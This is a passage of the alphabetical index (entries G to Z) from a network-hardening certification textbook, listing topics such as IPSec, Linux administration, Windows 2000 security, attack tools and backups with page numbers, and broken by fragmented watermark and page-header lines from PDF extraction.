file attachment vulnerabilities, 458-459

file permissions, 162-166, 272-274

file structure, 155

filter list, 129-132

finger, 357

firewall, 80

folder permissions, 272-274

Forward Lookup Zone, 435-436

configuring, 437-438

fping/gping tool, 492-493

FTP

capture, 46-48

configuring, 99-100

granting, 366-367

session analysis, 49

full-scale environment simulation, 386

Ggaining access, 535-537

gaining rights, 536

generator, 389-391

fuel types, 391

implementing, 391

GNOME, 139, 140-142

GNU Network Object Model Environment

See: GNOME

Gold Standard, 253

analyzing, 269-271

implementing, 268-269

GPO, 242

editing, 243-244

enforcing, 244-245

graphical tracing tool, 489-490

group policy, 242, 259-260

implementing, 242-243

Group Policy Object

See: GPO

groups

accounts, 146-151

adding, 148-150

security, 253

standard, 147-148

Windows 2000, 254-255

GRUB loader, 537

INDEX

Index 569

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 623: SCNP Hardening

Hhacker, 183-187

hacking, 428

hardware backup options, 394-395

hexadecimal conversion, 7-8

High security setting, 469-471

host, 3-6

host based access, 184-186

hot fixes, 451-452

checker, 452-453

HTML email attacks, 455-457

IIAB, 425-426

IANA, 425-426

IAS, 309-310

ICANN, 425-426

ICMP, 355-356

direct broadcast, 355

session analysis, 46

unreachable, 355-356

ICMP messages, 38-40

ICS, 303

IESG, 425-426

IETF, 425-426

IIS, 445-446

incremental backup, 408-409, 410-411

incomplete restore, 413-415

restoring data, 413

incremental restore, 415

inheritance, 274

inodes, 154

integrity, 35-38

Internet Architecture Board

See: IAB

Internet Assigned Numbers Authority

See: IANA

Internet components, 422

Internet Connection Sharing

See: ICS

Internet Corporation for Assigned Names and Numbers

See: ICANN

Internet Engineering Steering Group

See: IESG

Internet Engineering Task Force

See: IETF

Internet Explorer 6

advanced settings, 464-466

default settings, 467-468

security settings, 466-467

settings, 462-464

Internet Information Server

See: IIS

Internet Protocol

See: IP

Internet Service Provider

See: ISP

Internet Society

See: ISOC

intrusion, 216-223

intrusion detection, 296

IP, 7-9

address classes, 8-9

bind addresses, 191-193

datagram, 35-38

private addresses, 9

redirect addresses, 191-193

security, 78-79

special-function addresses, 9

IPSec

AH implementation, 89

configuring a response, 119-120

configuring options, 125-127

custom policies, 90-94

disabling, 134-135

full session, 128-129

implementing, 80-81, 100-101

modes, 79-80

policies, 83-84

ipsec6.exe command, 69-70

IPv6

addresses, 62-63

basics, 62

installing, 64-66

interfaces, 66-68

security, 64-66

INDEX

570 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 624: SCNP Hardening

traffic, 71-72

utilities, 68-69

x-cast, 63

ipv6.exe command, 69

ISOC, 425-426

ISP, 424

targeting, 430

JJohn the Ripper, 527-528

KK Desktop Environment

See: KDE

KDE, 139, 140-142

Kerberos, 251-252

kernel, 139

keys, 79

keystrokes

logging, 521-522

recording, 520-521

LL0pht, 523-527

LC4, 524-526

LAN, 86-89

LAN-to-LAN routing, 337

LAN-to-WAN routing, 338-340

last log file, 225-226

lastlog log file, 224-225

limited environment simulation, 386

link state routing, 348-349

Linux

administration, 138-139

backup options, 415-417

common commands, 143-145

disks, 152-153

file system, 151-156

logging in, 140

navigation, 139-145

partitions, 152-153

ping sweep, 492-493

run levels, 213

security, 162

system information, 158-162

traceroute, 489

Lion worm, 430

LM authentication, 247-248

Local Area Network

See: LAN

local security policy, 260-261

log files

managing, 295-296

log priority, 370-371

log viewer, 228-229

logging, 224-226, 283-285, 369-371

ACL, 374-376

anti-spoofing, 374

authentication, 291-294

buffered, 372

clearing, 538

configuring, 371-373

console, 371

last log, 225-226

lastlog, 224-225

secure log, 227

syslog, 372-373

terminal, 372

VTY, 375

Web server, 227

xferlog, 227

long distance carriers, 423

Low security setting, 468-469

Mmessage source, 486-487

metric, 346-350

Microsoft Management Console

See: MMC

Microsoft Virtual Machine

See: Microsoft VM

Microsoft VM, 471-472

mismatched IPSec

policies, 105-106

session analysis, 106-107

mismatched policies

AH and ESP, 124-125

INDEX

Index 571

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 625: SCNP Hardening

MMC, 81-83

customized configuration, 84

mounting devices, 153-154

MTU restrictions, 315

multicast, 14-15, 63

NNAP, 423-424

NAT, 303

Nessus, 507-510

vulnerability scan, 510-511

NetBIOS, 301-302

NetBus, 514-516

1.7, 515

Pro, 515-516

Netcat, 519-520

netstat tool, 497

network, 3-4

Network Access Point

See: NAP

Network Address Translation

See: NAT

Network File System

See: NFS

Network Information Centers

See: NIC

Network Information Service

See: NIS

Network Monitor, 22-28

Display view, 24-25

filters, 25-27

network security, 488

Network Service Provider

See: NSP

network system

gaining control, 519-520

NFS, 194-200

exports, 196-199

securing, 200-202

server, 194-196

NIC, 425-426

NIS, 202-203

nmap tool, 493

Front end, 506-507

OS detection, 505-506

no override, 259

NSP, 423

NTLM authentication, 248-249

NTLMv2, 249

NULL session, 275

Oobject auditing, 285-286

object ownership, 156

OOB attack, 539

Open Systems Interconnection

See: OSI

open-source software, 138-139

operating modes, 323

Organizational Units

See: OU

OS

detecting, 502-505

OS backup, 391-398

OSI model, 4-6

OU, 237-240

Out Of Bounds attack

See: OOB attack

Ppacket, 4-6

packet filter, 359-360

packet fragmentation, 44-45

packet sniffer, 460

PAM, 177-181

configuration files, 177

modules, 178-179

securing access, 180-181

security, 179-180

passive open connection, 18-20

passwords

cracking, 523-527

managing, 176-177

recommendations, 261-262

revealing, 529-531

security, 172-176

patched, 451-452

penetration, 483-484

INDEX

572 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 626: SCNP Hardening

permissions

assigning, 167

setting, 165

testing, 167-169

personal information, 476

phreaking, 483-484

physical security, 255-257

PID, 159

PING capture, 46-48

ping sweeps, 492-493

ping6.exe command, 70-71

Pinger tool, 493-494

plaintext, 79

Pluggable Authentication Modules

See: PAM

policy inheritance, 259

port scanning, 496-497

Windows, 499-502

ports, 20-22

privilege escalation, 535-536

probe, 430

Process Identifier

See: PID

profile, 473-474

promiscuous mode, 28-29

propagation, 274

protocol, 3-6

proxy, 291-294

RRADIUS, 304-305

creating users, 308-309

dialup server, 311-312

RAID levels, 392-394

recovery policy, 384

Red Hat Network, 182

redirect, 191-193

registry

auditing, 286-288

backup, 278-279

blocking access, 279-280

configuration, 277-278

remote access, 303-304

remove unneeded services, 358-359

Request

policy, 108-110

Request For Comments

See: RFC

Request-and-Respond

policy, 102-103

session analysis, 103-104

Request-and-Response

session analysis, 111-112

Request-only

session analysis, 101-102

Require

policy, 104-105

Require ESP IPSec policy, 114-115

Require ESP IPSec session, 115-117

Require response

policy, 107-108

Respond only

policy, 110-111

restoring

files from backup, 401-402

the network, 313

restricting logon hours, 253-254

Revelation, 529-531

Reverse Lookup Zone, 434-435

configuring, 437-438

RFC, 6-7

rights

gaining, 536

RIP, 310-311, 350-351

RIPv2, 351-353

risk analysis, 383

rootkit, 430

routed protocols, 345

router, 12-13

access passwords, 325-327

accessing, 323

banners, 327-328

navigating, 324-325

targeting, 429

user accounts, 327

routing, 12-13

process, 340-342

protocols, 345, 346-350

INDEX

Index 573

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 627: SCNP Hardening

Routing Information Protocol

See: RIP

SSAM, 536-537

deleting, 536-537

renaming, 536-537

Samba, 203-210

configuration files, 204-206

maintaining, 206-207

uses, 204

scripting vulnerabilities, 457-458

secedit.exe utility, 267-268

secure log file, 227

Secure Server policy, 83-84, 86-89

Secure Shell

See: SSH

Secure Sockets Layer

See: SSL

security, 16-17

analysis snap-in, 265-266

browser, 461-462

custom templates, 264-265

DNS, 432-433

email, 477-478

errata, 182-183

file, 272

folder, 272

IIS, 445-446

in Windows 2000, 253

Internet Explorer 6, 466-467

IPv6, 64-66

Linux, 162

PAM, 179-180

password, 172-176

printer, 276

registry, 276-277

statup/shutdown, 210-211

templates, 262-264

updates, 182-183

Web server, 444

Web server directory, 449

Windows 2000 network, 298-301

Security Accounts Manager

See: SAM

security architecture, 246

security audit, 505-506

security level, 263-264

security policies, 83-84

sequence numbers, 17

server, 3-4

Server policy, 83-84

service identification, 497-498

services

removing, 211-212

session teardown process, 34-35

SetGID, 169-172

SetUID, 169-172

shadow password file, 174-175

Simple Network Management Protocol

See: SNMP

simulated test, 385

small services, 357

smart cards, 252

smurfing, 314-316

sniffer, 460

SNMP, 323

social engineering, 531-532

source routing, 356

spoofing, 229-230

DNS, 433

SSH, 213-214, 330

client configuration, 333

router configuration, 330-333

using, 214-215

verification, 331-332

SSL, 246

stack detection, 503-505

Standard Secondary Server, 439-440

static routing, 342-345

Sticky Bit, 169-172

subnet mask, 10-12

subnetting, 10-12

SubSeven Trojan, 513-514

super block, 154

superdaemon, 187-194

SuperScan, 494-495

INDEX

574 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 628: SCNP Hardening

Syn attack defense, 314

SYSKEY, 249-250

syslog logging, 372-373

system hardening, 280-283

system statup/shutdown

security, 210-211

Ttarget networks, 483-484

TCP, 16-17

connections, 33-34

flags, 17

headers, 40-42

TCP wrapper, 183-187

configuration files, 184-186

TCP/IP

filtering, 316-317

hardening, 314-316

TCP/IP model, 3-4

Telnet

granting, 366

terminal logging, 372

Terminal Window, 142-143

threat, 383

three-way handshake, 16-17

timestamp, 371

topology, 347

traceroute, 355-356, 488-489

on Linux, 489

on Windows, 488

Transport mode, 79-80

AH, 80

ESP, 80

tripwire, 216-223

database, 218

integrity check, 218-219

modes, 216

policy, 216-218

Trojan Horse, 20-22, 513

Tunnel mode, 79-80

AH, 80

ESP, 80

UUDP, 16-17

UDP headers, 43-44

umask command, 171

undo configuration changes, 231

unicast, 14-15, 63

Uninteruptible Power Supply

See: UPS

UPS, 387-389

full server rack, 389

user accounts

expiration dates, 254

users

accounts, 146-151

adding, 148-150

security, 253

standard, 147-148

switching accounts, 151

VVariable Length Subnet Masking

See: VLSM

virus, 382, 512

VLSM, 13-14

VTY logging, 375

VTY password, 326

vulnerability, 247-248

vulnerability scanning, 441

WWAN, 236-237

Web design

common mistakes, 442-443

Web server

access control, 449-450

directory security, 449

Web server log files, 227

Web server security, 444

Web sites

configuration, 446-448

maintenance, 448

malicious, 517-518

Webmin, 157-158

INDEX

Index 575

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 629: SCNP Hardening

Wide Area Network

See: WAN

wildcard mask, 361-363

Windows

ping sweep, 493-496

Windows 2000

DNS, 433-434

EFS, 296-298

local login process, 250-251

network security, 298-301

port scanning, 499-502

printer security, 276

registry security, 276-277

security, 236-237

traceroute, 488

worm, 382, 512

Xx-cast, 14-15

xferlog log file, 227

xinetd.conf, 187-189

xinetd.d, 189-191

Zzone transfer, 440-441

Zone Transfer traffic, 432

INDEX

576 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n